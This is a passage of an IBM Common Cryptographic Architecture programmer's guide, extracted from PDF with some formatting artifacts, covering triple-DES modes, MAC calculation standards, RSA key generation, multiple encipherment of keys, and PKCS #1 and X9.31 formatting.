┌───────(cid:14)────────┐ ┌────┬──(cid:14)──┬─────┐ +│ Data (1,8) │ │Data (N*8─7,N*8)│ │Data│ Pad │Count│ +└────────────────┘ └────────────────┘ └────┴─────┴─────┘ +(cid:17)─── Plaintext to application program ────(cid:6) +Figure22.DecipheringusingtheANSIX9.23method +Triple-DES ciphering algorithms +Atriple-DES (TDES) algorithm is used to encrypt keys, PIN blocks, and general data. Several techniques +are employed: +TDES ECB +DES keys, when triple encrypted under a double-length DES key, are ciphered using an e-d-e +scheme without feedback. +498 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +TDES CBC +Encryption of general data, and RSAsection type X'08' CRT-format private keys and OPK keys, +employs the scheme depicted in Figure23 and Figure24 on page 500. This is often referred to as +“outer CBC mode.” +This CCAsupports double-length DES keys for triple-DES data encryption using the Encipher and +Decipher verbs. The triple-length asymmetric master key is used to CBC encrypt CRT-format OPK +keys. +EDEx / DEDx +CCAemploys EDEx processes for encrypting several of the RSAprivate key formats (section +types X'02', X'05', and X'06') and the OPK key in section type X'06'. The EDEx processes make +successive use of single-key DES CBC processes. EDE2, EDE3, and EDE5 processes have been +defined, based on the number of keys and initialization vectors used in the process. See Figure25 +on page 501 and Figure26 on page 502. K1, K2, and K3 are true keys while “K4” and “K5” are +initialization vectors. See Figure25 on page 501 and Figure26 on page 502. +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +│ T1(cid:17)64(cid:6) │ T2(cid:17)64(cid:6) │ T3(cid:17)64(cid:6) │ │ Tn(cid:17)64(cid:6) │ +└──────┬──────┴──────┬──────┴──────┬──────┴/┴──────┬──────┘ +(cid:14) (cid:14) (cid:14) (cid:14) +┌───┐ ┌───┐ ┌───┐ ┌───┐ +IV─(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌──//───(cid:6)│XOR│ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +Ka─(cid:6)│ e │ │ Ka─(cid:6)│ e │ │ Ka─(cid:6)│ e │ │ Ka─(cid:6)│ e │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +Kb─(cid:6)│ d │ │ Kb─(cid:6)│ d │ │ Kb─(cid:6)│ d │ │ Kb─(cid:6)│ d │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +Kc─(cid:6)│ e │ │ Kc─(cid:6)│ e │ │ Kc─(cid:6)│ e │ │ Kc─(cid:6)│ e │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +├────┘ ├────┘ ├────┘ │ +(cid:14) (cid:14) (cid:14) (cid:14) +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +│ S1(cid:17)64(cid:6) │ S2(cid:17)64(cid:6) │ S3(cid:17)64(cid:6) │ │ Sn(cid:17)64(cid:6) │ +└─────────────┴─────────────┴─────────────┴/┴─────────────┘ +For 2-key triple-DES, Kc = Ka +Figure23.Triple-DESCBCencryptionprocess +AppendixF.Cryptographicalgorithmsandprocesses 499 + +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +│ S1(cid:17)64(cid:6) │ S2(cid:17)64(cid:6) │ S3(cid:17)64(cid:6) │ │ Sn(cid:17)64(cid:6) │ +└──────┬──────┴──────┬──────┴──────┬──────┴/┴──────┬──────┘ +├────┐ ├────┐ ├────┐ │ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +Kc─(cid:6)│ d │ │ Kc─(cid:6)│ d │ │ Kc─(cid:6)│ d │ │ Kc─(cid:6)│ d │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +Kb─(cid:6)│ e │ │ Kb─(cid:6)│ e │ │ Kb─(cid:6)│ e │ │ Kb─(cid:6)│ e │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +Ka─(cid:6)│ d │ │ Ka─(cid:6)│ d │ │ Ka─(cid:6)│ d │ │ Ka─(cid:6)│ d │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +IV─(cid:6)│XOR│ └─────(cid:6)│XOR│ └─────(cid:6)│XOR│ └──//───(cid:6)│XOR│ +└─┬─┘ └─┬─┘ └─┬─┘ └─┬─┘ +(cid:14) (cid:14) (cid:14) (cid:14) +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +│ T1(cid:17)64(cid:6) │ T2(cid:17)64(cid:6) │ T3(cid:17)64(cid:6) │ │ Tn(cid:17)64(cid:6) │ +└─────────────┴─────────────┴─────────────┴/┴─────────────┘ +For 2-key triple-DES, Kc = Ka +Figure24.Triple-DESCBCdecryptionprocess +500 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +EDE2 EDE3 EDE5 │ T1<64> │ T2<64> │ T3<64> │ │ Tn<64> │ +└──────┬──────┴──────┬──────┴──────┬──────┴/┴──────┬──────┘ +(cid:14) (cid:14) (cid:14) (cid:14) +┌───┐ ┌───┐ ┌───┐ ┌───┐ +0 0 K4 IVa─(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌──//───(cid:6)│XOR│ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +K1 K1 K1 Ka─(cid:6)│ e │ │ Ka─(cid:6)│ e │ │ Ka─(cid:6)│ e │ │ Ka─(cid:6)│ e │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +├────┘ ├────┘ ├────┘ │ +├────┐ ├────┐ ├────┐ │ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +K2 K2 K2 Kb─(cid:6)│ d │ │ Kb─(cid:6)│ d │ │ Kb─(cid:6)│ d │ │ Kb─(cid:6)│ d │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +0 0 0 IVb─(cid:6)│XOR│ └─────(cid:6)│XOR│ └─────(cid:6)│XOR│ └──//───(cid:6)│XOR│ +└─┬─┘ └─┬─┘ └─┬─┘ └─┬─┘ +(cid:14) (cid:14) (cid:14) (cid:14) +┌───┐ ┌───┐ ┌───┐ ┌───┐ +0 0 K5 IVc─(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌──//───(cid:6)│XOR│ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +K1 K3 K3 Kc─(cid:6)│ e │ │ Kc─(cid:6)│ e │ │ Kc─(cid:6)│ e │ │ Kc─(cid:6)│ e │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +├────┘ ├────┘ ├────┘ │ +(cid:14) (cid:14) (cid:14) (cid:14) +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +│ S1<64> │ S2<64> │ S3<64> │ │ Sn<64> │ +└─────────────┴─────────────┴─────────────┴/┴─────────────┘ +Figure25.EDEalgorithm +AppendixF.Cryptographicalgorithmsandprocesses 501 + +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +EDE2 EDE3 EDE5 │ S1<64> │ S2<64> │ S3<64> │ │ Sn<64> │ +└──────┬──────┴──────┬──────┴──────┬──────┴/┴──────┬──────┘ +├────┐ ├────┐ ├────┐ │ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +K1 K3 K3 Kc─(cid:6)│ d │ │ Kc─(cid:6)│ d │ │ Kc─(cid:6)│ d │ │ Kc─(cid:6)│ d │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +0 0 K5 IVc─(cid:6)│XOR│ └─────(cid:6)│XOR│ └─────(cid:6)│XOR│ └──//───(cid:6)│XOR│ +└─┬─┘ └─┬─┘ └─┬─┘ └─┬─┘ +(cid:14) (cid:14) (cid:14) (cid:14) +┌───┐ ┌───┐ ┌───┐ ┌───┐ +0 0 0 IVb─(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌─────(cid:6)│XOR│ ┌──//───(cid:6)│XOR│ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +K2 K2 K2 Kb─(cid:6)│ e │ │ Kb─(cid:6)│ e │ │ Kb─(cid:6)│ e │ │ Kb─(cid:6)│ e │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +├────┘ ├────┘ ├────┘ │ +├────┐ ├────┐ ├────┐ │ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +K1 K1 K1 Ka─(cid:6)│ d │ │ Ka─(cid:6)│ d │ │ Ka─(cid:6)│ d │ │ Ka─(cid:6)│ d │ +└─┬─┘ │ └─┬─┘ │ └─┬─┘ │ └─┬─┘ +(cid:14) │ (cid:14) │ (cid:14) │ (cid:14) +┌───┐ │ ┌───┐ │ ┌───┐ │ ┌───┐ +0 0 K4 IVa─(cid:6)│XOR│ └─────(cid:6)│XOR│ └─────(cid:6)│XOR│ └──//───(cid:6)│XOR│ +└─┬─┘ └─┬─┘ └─┬─┘ └─┬─┘ +(cid:14) (cid:14) (cid:14) (cid:14) +┌─────────────┬─────────────┬─────────────┬/┬─────────────┐ +│ T1<64> │ T2<64> │ T3<64> │ │ Tn<64> │ +└─────────────┴─────────────┴─────────────┴/┴─────────────┘ +Figure26.DEDprocess +MAC calculation methods +Four variations of DES-based message authentication can be used by the MAC Generate and MAC Verify +verbs: +v “ANSI X9.9 MAC” +v “ANSI X9.19 Optional Procedure 1 MAC” on page 503 +v “EMV MAC” on page 503 +v “ISO 16609 TDES MAC” on page 503 +ANSI X9.9 MAC +The Financial Institution (Wholesale) MessageAuthentication Standard (ANSI X9.9-1986) defines a +process for the authentication of messages from originator to recipient. This process is called the Message +Authentication Code (MAC) calculation method.3 +Figure27 on page 503 shows the MAC calculation for binary data. In this figure, KEY is a 64-bit key, and +T - T are 64-bit data blocks of text. If T is less than 64 bits long, binary zeros are appended to the right +1 n n +of T . Data blocks T ...T are DES CBC-encrypted with all output discarded except for the final output +n 1 n +block, O . +n +3.TheANSIX9.9standarddefinesfiveoptions.TheMACGenerateandMACVerifyverbsimplementoption1,binarydata. +502 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +ANSI X9.19 Optional Procedure 1 MAC +The Financial Institution (Retail) MessageAuthentication Standard,ANSI X9.19 Optional Procedure 1 +(ISO/IEC 9797-1,Algorithm 3) specifies additional processing of the 64-bit O MAC value. The CCA +n +“X9.19OPT” process employs a double-length DES key.After calculating the 64-bit MAC as above with the +left half of the double-length key, the result is decrypted using the right half of the double-length key. This +result is then encrypted with the left half of the double-length key. The resulting MAC value is processed +according to other specifications supplied to the verb call. +EMV MAC +The EMV smart card standards define MAC generation and verification processes that are the same as +ANSI X9.9 andANSI X9.19 Optional Procedure 1 (ISO/IEC 9797-1,Algorithm 3), except for padding added +to the end of the message.Append one byte of X'80' to the original message. Then append additional +bytes, as required, of X'00' to form an extended message, which is a multiple of eight bytes in length. +In the X9.9 and X9.19 Optional Procedure 1 standards, the leftmost 32 bits (4 bytes) of O are taken as +n +the MAC. In the EMV standards, the MAC value is between four and eight bytes in length. CCAprovides +support for the leftmost four, six, and eight bytes of MAC value. +T T T T +1 2 n-1 n +XOR XOR XOR +KEY Enc KEY Enc KEY Enc KEY Enc +O O O O +1 2 n-1 n +(OCV) +ANSI X9.9 MAC +(and to decipher and +encipher for ANSI X9.19) +Figure27.MACcalculationmethod +ISO 16609 TDES MAC +ISO 16609 defines a process for protecting the integrity of transmitted banking messages and for verifying +that a message has originated from an authorized source. This process is called the ISO 16609 TDES +MAC method. The ISO 16609 TDES MAC method corresponds to ISO/IEC 9797-1, algorithm 1 using +T-DEA(ANSI X9.52:1998). ISO/FDIS 16609 identifies this method as one of the recommended ways to +generate a MAC using symmetric techniques. +The ISO 16609 TDES MAC method uses a double-length DES key and operates on data blocks that are a +multiple of eight bytes. If the last input data block is not a multiple of eight bytes, binary zeros are +appended to the right of the block.ACBC mode triple-DES (TDES) encryption operation is performed on +the data, with all output discarded except for the final output block. +The resulting MAC value is processed according to other specifications supplied to the verb call. +AppendixF.Cryptographicalgorithmsandprocesses 503 + +RSA key-pair generation +RSAkey-pair generation is determined based on user input of the modulus bit length, public exponent, and +key type. The output is based on creating primes p and q in conformance withANSI X9.31 requirements +as follows: +v prime p bit length = ((modulus_bit_length +1)/2) +v prime q bit length = modulus_bit_length - p_bit_length +v p and q are randomly chosen prime numbers +v p > q +v The Rabin-Miller Probabilistic Primality Test is iterated 8 times for each prime. This test determines that +a false prime is produced with probability no greater then 1/4c, where c is the number of iterations. +Refer to theANSI X9.31 standard and see the section entitled “Miller-Rabin Probabilistic Primality Test.” +v Primes p and q are relatively prime with the public exponent. +v Primes p and q are different in at least one of the first 100 most significant bits, that is, |p-q| > 2(prime bit +length - 100). For example, when the modulus bit length is 1024, then both primes bit length are 512 bits +and the difference of the two primes is |p-q| > 2412. +1. For each key generation, and for any size of key, the PKAmanager seeds an internal FIPS-approved, +SHA-1 based psuedo random number generator (PRNG) with the first 24 bytes of information that it +receives from three successive calls to the random number generator (RNG) manager's PRNG +interface. +2. The RNG manager can supply random number in two ways, but with the CCASupport Program only +one way is used, namely, the PRNG method. The PKAmanager seeds an internal FIPS-approved, +SHA-1 based PRNG with 24 bytes obtained. +The RNG manager can respond to requests for random numbers from other processes with such +responses interspersed between responses to PKAmanager requests.An RSAkey is generated from +random information obtained from two cascaded SHA-1 PRNGs. +3. An RSAkey is based on one or more 24-byte seeds from the RNG manager source, depending on the +dynamic mix of tasks running inside the coprocessor. +There exists a system RNG manager (ANSI X9.31 compliant) that is used as the source for pseudo +random numbers. The PKAmanager also has a PRNG that is DSAcompliant for generating primes. The +PKAmanager PRNG is re-seeded from the system RNG manager, for every new key pair generation, +which is for every generation of a public/private key pair. +Multiple decipherment and encipherment +This section explains multiple encipherment and decipherment and their equations. +CCAuses multiple encipherment whenever it enciphers a key under a key-encrypting key such as the +master key or the transport key and in triple-DES encipherment for data privacy. Multiple encipherment is +superior to single encipherment because multiple encipherment increases the work needed to “break” a +key. CCAprovides extra protection for a key by enciphering it under an enciphering key multiple times +rather than once. The multiple encipherment method for keys enciphered under a key-encrypting key uses +a double-length (128-bit) key split into two 64-bit halves. Like single encipherment, multiple encipherment +uses a DES based on the electronic code book (ECB) mode of encipherment. +Keys can either be double-length or single-length depending on the installation and their cryptographic +function. When a single-length key is encrypted under a double-length key, multiple encipherment is +performed on the key. In the multiple encipherment method, the key is encrypted under the left half of the +enciphering key. The result is then decrypted under the right half of the enciphering key. Finally, this result +is encrypted under the left half of the enciphering key again. +504 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +When a double-length key is encrypted with multiple encipherment, the method is similar, except CCA +uses two enciphering keys. One enciphering key encrypts each half of the double-length key. +Double-length keys active on the system have two master key variants used when enciphering them. +Multiple encipherment and decipherment is not only used to protect or retrieve a cryptographic key, but +they are also used to protect or retrieve 64-bit data in the area of PIN applications. For example, the +following two sections use a double-length *KEK as an example to cipher a single-length key even though +the same algorithms apply to cipher 64-bit data by a double-length PIN-related cryptographic key. +CCAalso supports triple-DES encipherment for data privacy using double-length and triple-length DATA +keys. For this procedure the data is first enciphered using the first DATAkey. The result is then deciphered +using the second DATAkey. This second result is then enciphered using the third DATAkey when a +triple-length key is provided or reusing the first DATAkey when a double-length key is provided. +Note that an asterisk (*) preceding the key means the key is double-length. Notations in this chapter have +the following meaning: +v eK(x), where x is enciphered under K +v dK(y) represents plaintext, where K is the key and y is the ciphertext +Therefore, dK(eK(x)) equals x for any 64-bit key K and any 64-bit plaintext x. +When a key (*K) to be protected is double-length, two double-length *KEKs are used. One *KEK is used +for protecting the left half of the key (*K); another is for the right half. Multiple encipherment is used with +the appropriate *KEK for protecting each half of the key. +Multiple encipherment of single-length keys +The multiple encipherment of a single-length key (K) using a double-length *KEK is defined as follows: +e*KEK(K) = eKEKL(dKEKR(eKEKL(K))) +where KEKLis the left 64 bits of *KEK and KEKR is the right 64 bits of *KEK. +Figure28 illustrates the definition. +AppendixF.Cryptographicalgorithmsandprocesses 505 + +K +KEKL E +KEKR D +KEKL E +e*KEK(K) +Figure28.Multipleenciphermentofsingle-lengthkeys +Multiple decipherment of single-length keys +The multiple encipherment of an encrypted single-length key (Y = e*KEK(K)) using a double-length *KEK +is defined as follows: +d*KEK(Y) = dKEKL(eKEKR(dKEKL(Y))) += d*KEK(e*KEK(K)) += K +where KEKLis the left 64 bits of *KEK and KEKR is the right 64 bits of *KEK. +Figure29 illustrates the definition. +506 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +e*KEK(K) +KEKL D +KEKR E +KEKL D +K +Figure29.Multipledeciphermentofsingle-lengthkeys +Multiple encipherment of double-length keys +The multiple encipherment of a double-length key (*K) using two double-length *KEKs, *KEKa, and *KEKb +is defined as follows: +e*KEKa(KL) || e*KEKb(KR) = +eKEKaL(dKEKaR(eKEKaL(KL))) || +eKEKbL(dKEKbR(eKEKbL(KR))) +where: +v KLis the left 64 bits of *K +v KR is the right 64 bits of *K +v KEKaLis the left 64 bits of *KEKa +v KEKaR is the right 64 bits of *KEKa +v KEKbLis the left 64 bits of *KEKb +v KEKbR is the right 64 bits of *KEKb +v || means concatenation +Figure30 illustrates the definition. +AppendixF.Cryptographicalgorithmsandprocesses 507 + +KL KR +KEKaL E KEKbL E +KEKaR D KEKbR D +KEKaL E KEKbL E +e*KEKa(KL) e*KEKb(KR) +Figure30.Multipleenciphermentofdouble-lengthkeys +Multiple decipherment of double-length keys +The multiple decipherment of an encrypted double-length key, *Y = e*KEKa(KL) || e*KEKb(KR), using two +double-length *KEKs, *KEKa, and *KEKb, is defined as follows: +D*KEKa(YL) || d*KEKb(YR) += dKEKaL(eKEKaR(dKEKaL(YL))) || +dKEKbL(eKEKbR(dKEKbL(YR))) += d*KEKa(e*KEKa(KL)) || +d*KEKb(e*KEKb(KR)) += *K +where +v YLis the left 64 bits of *Y +v YR is the right 64 bits of *Y +v KEKaLis the left 64 bits of *KEKa +v KEKaR is the right 64 bits of *KEKa +v KEKbLis the left 64 bits of *KEKb +v KEKbR is the right 64 bits of *KEKb +v || means concatenation +Figure31 illustrates the definition. +508 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +YL = e*KEKa(KL) YR = e*KEKb(KR) +KEKaL D KEKbL D +KEKaR E KEKbR E +KEKaL D KEKbL D +KL KR +Figure31.Multipledeciphermentofdouble-lengthkeys +Multiple encipherment of triple-length keys +The multiple encipherment of a triple-length key (**K) using two double-length *KEKs, *KEKa, and *KEKb +is defined as follows: +e*KEKa(KL) || e*KEKb(KM) || e*KEKa(KR) = +eKEKaL(dKEKaR(eKEKaL(KL))) || +eKEKbL(dKEKbR(eKEKbL(KM))) || +eKEKaL(dKEKaR(eKEKaL(KR))) +where: +v KLis the left 64 bits of **K +v KM is the next 64 bits of **K +v KR is the right 64 bits of **K +v KEKaLis the left 64 bits of *KEKa +v KEKaR is the right 64 bits of *KEKa +v KEKbLis the left 64 bits of *KEKb +v KEKbR is the right 64 bits of *KEKb +v || means concatenation +Figure32 on page 510 illustrates the definition. +AppendixF.Cryptographicalgorithmsandprocesses 509 + +YL = e*KEKa(KL) YM = e*KEKb(KM) YR = e*KEKa(KR) +KEKaL D KEKbL D KEKaL D +KEKaR E KEKbR E KEKaR E +KEKaL D KEKbL D KEKaL D +KL KM KR +Figure32.Multipleenciphermentoftriple-lengthkeys +Multiple decipherment of triple-length keys +The multiple decipherment of an encrypted triple-length key **Y = e*KEKa(KL) || e*KEKb(KM) || +e*KEKa(KR), using two double-length *KEKs, *KEKa, and *KEKb, is defined as follows: +d*KEKa(YL) || d*KEKb(YM) || d*KEKa(YR) += dKEKaL(eKEKaR(dKEKaL(YL))) || +dKEKbL(eKEKbR(dKEKbL(YM))) || +dKEKaL(eKEKaR(dKEKaL(YR))) += d*KEKa(e*KEKa(KL)) || +d*KEKb(e*KEKb(KM)) || +d*KEKa(e*KEKa(KR)) += **K +where: +v YLis the left 64 bits of **Y +v YM is the next 64 bits of **Y +v YR is the right 64 bits of **Y +v KEKaLis the left 64 bits of *KEKa +v KEKaR is the right 64 bits of *KEKa +v KEKbLis the left 64 bits of *KEKb +v KEKbR is the right 64 bits of *KEKb +v || means concatenation +Figure33 on page 511 illustrates the definition. +510 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +KL KM KR +KEKaL E KEKbL E KEKaL E +KEKaR D KEKbR D KEKaR D +KEKaL E KEKbL E KEKaL E +e*KEKa(KL) e*KEKb(KM) e*KEKa(KR) +Figure33.Multipledeciphermentoftriple-lengthkeys +PKA92 key format and encryption process +The Symmetric Key Generate and the Symmetric Key Import verbs optionally support a PKA92 method of +encrypting a DES key with an RSApublic key. This format is adapted from the IBM Transaction Security +System (TSS) 4753 and 4755 product's implementation of “PKA92”. The verbs do not create or accept the +complete PKA92AS key token as defined for the TSS products. Rather, the verbs support only the actual +RSA-encrypted portion of a TSS PKA92 key token, the AS External Key Block. +Forming an external key block - The PKA96 implementation forms anAS External Key Block by +RSA-encrypting a key block using a public key. The key block is formed by padding the key record +detailed in Table158 with zero bits on the left, high-order end of the key record. The process completes +the key block with three sub-processes: masking, overwriting, and RSAencrypting. +Table158.PKA96clearDESkeyrecord +Offset(Bytes) Length(Bytes) Description +Zero-bitpaddingtoformastructureaslongasthelengthofthepublickeymodulus.Theimplementationconstrains +thepublickeymodulustoamultipleof64bitsintherangeof512-1024bits.Notethatgovernmentexportorimport +regulationscanimposelimitsonthemoduluslength.Themaximumlengthisvalidatedbyacheckagainstavaluein +theFunctionControlVector. +000 005 Headerandflags:X'0100000000.' +005 016 EnvironmentIdentifier(EID),encodedinASCII. +021 008 ControlvectorbasefortheDESkey. +029 008 RepeatoftheCVdataatoffset021. +037 008 Thesingle-lengthDESkeyorthelefthalfofadouble-lengthDESkey. +045 008 Therighthalfofadouble-lengthDESkeyorarandomnumber.Thisvalueis +locallydesignated"K." +AppendixF.Cryptographicalgorithmsandprocesses 511 + +Table158.PKA96clearDESkeyrecord (continued) +Offset(Bytes) Length(Bytes) Description +053 008 Randomnumber,"IV." +061 001 Endingbyte,X'00.' +Masking Sub-process - Create a mask by CBC encrypting a multiple of eight bytes of binary zeros using K +as the key and IV as the initialization vector as defined in the key record at offsets 45 and 53. XOR the +mask with the key record and call the result PKR. +Overwriting Sub-process - Set the high-order bits of PKR to B'01' and set the low-order bits to B'0110'. +XOR K and IV and write the result at offset 45 in PKR. +Write IV at offset 53 in PKR. This causes the masked and overwritten PKR to have IV at its original +position. +Encrypting Sub-process - RSAencrypt the overwritten PKR masked key record using the public key of the +receiving node. +Recovering a key from an external key block - Recover the encrypted DES key from anAS External +Key Block by performing decrypting, validating, unmasking, and extraction sub-processes. +Decrypting Sub-process - RSAdecrypt theAS External Key Block using an RSAprivate key and call the +result of the decryption PKR. The private key must be usable for key management purposes. +Validating Sub-process - Verify the high-order two bits of the PKR record are valued to B'01' and the +low-order four bits of the PKR record are valued to B'0110'. +Unmasking Sub-process - Set IV to the value of the eight bytes at offset 53 of the PKR record. Note that +there is a variable quantity of padding prior to offset 0. See Table158 on page 511. +Set K to the XOR of IV and the value of the eight bytes at offset 45 of the PKR record. +Create a mask equal in length to the PKR record by CBC encrypting a multiple of eight bytes of binary +zeros using K as the key and IV as the initialization vector. XOR the mask with PKR and call the result the +key record. +Copy K to offset 45 in the PKR record. +Extraction Sub-process. Confirm that: +v The four bytes at offset 1 in the key record are valued to X'0000 0000' . +v The two control vector fields at offsets 21 and 29 are identical. +v If the control vector is an IMPORTER or EXPORTER key class, the Environment Identifier (EID) in the +key record is not the same as the EID stored in the cryptographic engine. +The control vector base of the recovered key is the value at offset 21. If the control vector base bits 40 - +42 are valued to B'010' or B'110', the key is double length. Set the right half of the received key's control +vector equal to the left half and reverse bits 41 and 42 in the right half. +The recovered key is at offset 37 and is either 8 or 16 bytes long based on the control vector base bits 40 +- 42. If these bits are valued to B'000', the key is single length. If these bits are valued to B'010' or B'110', +the key is double length. +512 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Formatting hashes and keys in public-key cryptography +The Digital Signature Generate and Digital Signature Verify verbs support several methods for formatting a +hash and, in some cases, a descriptor for the hashing method, into a bit-string to be processed by the +cryptographic algorithm. This section discusses theANSI X9.31 and PKCS #1 methods. The ISO 9796-1 +method can be found in the ISO standard. +This section also describes the PKCS #1, version 1, 1.5, and 2.0, methods for placing a key in a bit string +for RSAciphering as part of a key exchange. +ANSI X9.31 hash format +WithANSI X9.31, the string that is processed by the RSAalgorithm is formatted by the concatenation of a +header, padding, the hash value and a trailer, from the most significant bit to the least significant bit, so +that the resulting string is the same length as the modulus of the key. For CCA, the modulus length must +be a multiple of 8 bits. +v The header consists of the value X'6B'. +v The padding consists of the value X'BB', repeated as many times as required, and ended with X'BA'. +v The hash value follows the padding. +v The trailer consists of a hashing mechanism specifier and final byte. The hashing mechanism specifier +is defined as one of the following values: +X'31' RIPEMD-160 +X'32' RIPEMD-128 +X'33' SHA-1 +X'34' SHA-256 (Release 3.30.05 or later) +v The final byte is X'CC'. +PKCS #1 formats +Version 2.0 of the PKCS #1 standard 4 defines methods for formatting keys and hashes prior to RSA +encryption of the resulting data structures. The earlier versions of the PKCS #1 standard defined block +types 0, 1, and 2, but in the current standard that terminology is dropped. +CCAimplemented these processes using the terminology of the Version 2.0 standard: +v For formatting keys for secured transport CSNDSYX, CSNDSYG, CSNDSYI): +– RSAES-OAEP, the preferred method for key-encipherment 5 when exchanging DATAkeys between +systems. Keyword PKCSOAEP is used to invoke this formatting technique. The P parameter +described in the standard is not used and its length is set to zero. +– RSAES-PKCS1-v1_5, is an older method for formatting keys. Keyword PKCS-1.2 is used to invoke +this formatting technique. +v For formatting hashes for digital signatures (CSNDDSG and CSNDDSV): +– RSASSA-PKCS1-v1_5, the newer name for the block-type 1 format. Keyword PKCS-1.1 is used to +invoke this formatting technique. +– The PKCS #1 specification no longer discusses use of block-type 0. Keyword PKCS-1.0 is used to +invoke this formatting technique. Use of block-type 0 is discouraged. +4.PKCSstandardscanberetrievedfromhttp://www.rsasecurity.com/rsalabs/pkcs. +5.ThePKA92methodandthemethodincorporatedintotheSETstandardareotherexamplesoftheOptimalAsymmetricEncryption +Padding(OAEP)technique.TheOAEPtechniqueisattributedtoBellareandRogaway. +AppendixF.Cryptographicalgorithmsandprocesses 513 + +Using the terminology from older versions of the PKCS #1 standard, block types 0 and 1 are used to +format a hash and block type 2 is used to format a DES key. The blocks consist of the following (“||” +means concatenation): +v X'00' || BT || PS || X'00' || D +v +v where: +BT Is the block type, X'00', X'01', or X'02'. +PS Is the padding of as many bytes as required to make the block the same length as the modulus of +the RSAkey, and is bytes of X'00' for block type 0, X'FF' for block type 1, and random and +non-X'00' for block type 2. The length of PS must be a minimum of eight bytes. +D Is the key, or the concatenation of the BER-encoded hash identifier and the hash value. +You can create the BER encoding of an MD5 or SHA-1 value by prepending these strings to the 16-byte +or 20-byte hash values, respectively: +MD5 X'3020300C 06082A86 4886F70D 02050500 0410' +SHA-1 X'30213009 06052B0E 03021A05 000414' +514 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Appendix G. Access control points and verbs +| This appendix gives details about theAccess Control Points (ACPs) used by the verbs in this document. +| ACPs are also referred to as commands. +Important: By default, you should disable commands. Do not enable anACP unless you know why you +are enabling it. +For instructions on how to enable and disable theseACPs using the TKE workstation, see z/OS +Cryptographic Services ICSF: Trusted Key Entry PCIX Workstation User’s Guide. +For systems that do not use the optional TKE workstation, mostACPs (current and new) are enabled in +the DEFAULT role with the appropriate licensed internal code on the CEX3C. +| Note that each 